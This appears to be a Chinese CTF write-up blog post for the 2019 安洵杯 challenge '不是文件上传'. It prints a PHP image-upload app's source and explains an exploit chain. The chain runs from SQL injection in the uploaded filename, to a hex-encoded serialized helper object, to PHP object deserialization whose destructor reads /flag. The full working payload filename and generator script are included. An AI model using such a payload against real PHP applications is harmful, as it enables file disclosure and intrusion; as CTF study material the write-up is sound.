[安洵杯 2019]不是文件上传1

给了源码,代码审计

upload.php

<!DOCTYPE html>

<html>

<head>

<title>Image Upload</title>

<link rel="stylesheet" href="./style.css">

<meta http-equiv="content-type" content="text/html;charset=UTF-8"/>

</head>

<body>

<p align="center"><img src="https://i.loli.net/2019/10/06/i5GVSYnB1mZRaFj.png" width=300 length=150></p>

<div align="center">

<form name="upload" action="" method="post" enctype ="multipart/form-data" >

<input type="file" name="file">

<input type="Submit" value="submit">

</form>

</div>

<br>

<p><a href="./show.php">You can view the pictures you uploaded here</a></p>

<br>

<?php

include("./helper.php");

class upload extends helper {

public function upload_base(){

$this->upload();

}

}

if ($_FILES){

if ($_FILES["file"]["error"]){

die("Upload file failed.");

}else{

$file = new upload();

$file->upload_base();

}

}

$a = new helper();

?>

</body>

</html>

show.php

<!DOCTYPE html>

<html>

<head>

<title>Show Images</title>

<link rel="stylesheet" href="./style.css">

<meta http-equiv="content-type" content="text/html;charset=UTF-8"/>

</head>

<body>

<h2 align="center">Your images</h2>

<p>The function of viewing the image has not been completed, and currently only the contents of your image name can be saved. I hope you can forgive me and my colleagues and I are working hard to improve.</p>

<hr>

<?php

include("./helper.php");

$show = new show();

if($_GET["delete_all"]){

if($_GET["delete_all"] == "true"){

$show->Delete_All_Images();

}

}

$show->Get_All_Images();

class show{

public $con;

public function __construct(){

$this->con = mysqli_connect("127.0.0.1","r00t","r00t","pic_base");

if (mysqli_connect_errno($this->con)){

die("Connect MySQL Fail:".mysqli_connect_error());

}

}

public function Get_All_Images(){

$sql = "SELECT * FROM images";

$result = mysqli_query($this->con, $sql);

if ($result->num_rows > 0){

while($row = $result->fetch_assoc()){

if($row["attr"]){

$attr_temp = str_replace('\0\0\0', chr(0).'*'.chr(0), $row["attr"]);

$attr = unserialize($attr_temp);

}

echo "<p>id=".$row["id"]." filename=".$row["filename"]." path=".$row["path"]."</p>";

}

}else{

echo "<p>You have not uploaded an image yet.</p>";

}

mysqli_close($this->con);

}

public function Delete_All_Images(){

$sql = "DELETE FROM images";

$result = mysqli_query($this->con, $sql);

}

}

?>

<p><a href="show.php?delete_all=true">Delete All Images</a></p>

<p><a href="upload.php">Upload Images</a></p>

</body>

</html>

helper.php

<?php

class helper {

protected $folder = "pic/";

protected $ifview = False;

protected $config = "config.txt";

// The function is not yet perfect, it is not open yet.

public function upload($input="file")

{

$fileinfo = $this->getfile($input);

$array = array();

$array["title"] = $fileinfo['title'];

$array["filename"] = $fileinfo['filename'];

$array["ext"] = $fileinfo['ext'];

$array["path"] = $fileinfo['path'];

$img_ext = getimagesize($_FILES[$input]["tmp_name"]);

$my_ext = array("width"=>$img_ext[0],"height"=>$img_ext[1]);

$array["attr"] = serialize($my_ext);

$id = $this->save($array);

if ($id == 0){

die("Something wrong!");

}

echo "<br>";

echo "<p>Your images is uploaded successfully. And your image's id is $id.</p>";

}

public function getfile($input)

{

if(isset($input)){

$rs = $this->check($_FILES[$input]);

}

return $rs;

}

public function check($info)

{

$basename = substr(md5(time().uniqid()),9,16);

$filename = $info["name"];

$ext = substr(strrchr($filename, '.'), 1);

$cate_exts = array("jpg","gif","png","jpeg");

if(!in_array($ext,$cate_exts)){

die("<p>Please upload the correct image file!!!</p>");

}

$title = str_replace(".".$ext,'',$filename);

return array('title'=>$title,'filename'=>$basename.".".$ext,'ext'=>$ext,'path'=>$this->folder.$basename.".".$ext);

}

public function save($data)

{

if(!$data || !is_array($data)){

die("Something wrong!");

}

$id = $this->insert_array($data);

return $id;

}

public function insert_array($data)

{

$con = mysqli_connect("127.0.0.1","r00t","r00t","pic_base");

if (mysqli_connect_errno($con))

{

die("Connect MySQL Fail:".mysqli_connect_error());

}

$sql_fields = array();

$sql_val = array();

foreach($data as $key=>$value){

$key_temp = str_replace(chr(0).'*'.chr(0), '\0\0\0', $key);

$value_temp = str_replace(chr(0).'*'.chr(0), '\0\0\0', $value);

$sql_fields[] = "`".$key_temp."`";

$sql_val[] = "'".$value_temp."'";

}

$sql = "INSERT INTO images (".(implode(",",$sql_fields)).") VALUES(".(implode(",",$sql_val)).")";

mysqli_query($con, $sql);

$id = mysqli_insert_id($con);

mysqli_close($con);

return $id;

}

public function view_files($path){

if ($this->ifview == False){

return False;

//The function is not yet perfect, it is not open yet.

}

$content = file_get_contents($path);

echo $content;

}

function __destruct(){

# Read some config html

$this->view_files($this->config);

}

}

?>

这道题首先给了源码,但是我没看到,进了页面,他储存的文件并不保存在他数据库,也不像是sql注入,所以扫描文件,拿到源码,审计

第一个可疑的地方是show.php里面的$attr变量,这里有一个反序列化

跟进

$array["attr"] = serialize($my_ext);

$my_ext = array("width"=>$img_ext[0],"height"=>$img_ext[1]);

发现 attr变量实际上是图片的属性长和宽

这里有file_get_contents函数

我审计的时候没看到,wp告诉我的,实际上这个位置很明显

当满足ifview=true时,传入config为./flag路径就能拿到flag

php序列化代码,抄wp的

<?php

class helper

{

protected $ifview = true;

protected $config = "/flag";

}

$a = new helper();

echo serialize($a);

echo '<br>';

echo bin2hex(serialize($a));

抄wp:

因为attr字段列名在最后所以放在第5个位置。又因为上传的文件名中不能有双引号,所以将payload进行16进制编码,别忘了前面加上0x。

最后用#注释掉’value2’,‘value3’,…防止报错

三行字信息量巨大,全是我不会的小细节

最后传入文件名为

1','2','3','4',0x4f3a363a2268656c706572223a323a7b733a393a22002a00696676696577223b623a313b733a393a22002a00636f6e666967223b733a353a222f666c6167223b7d)#.png

的图片,查看,得到flag

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值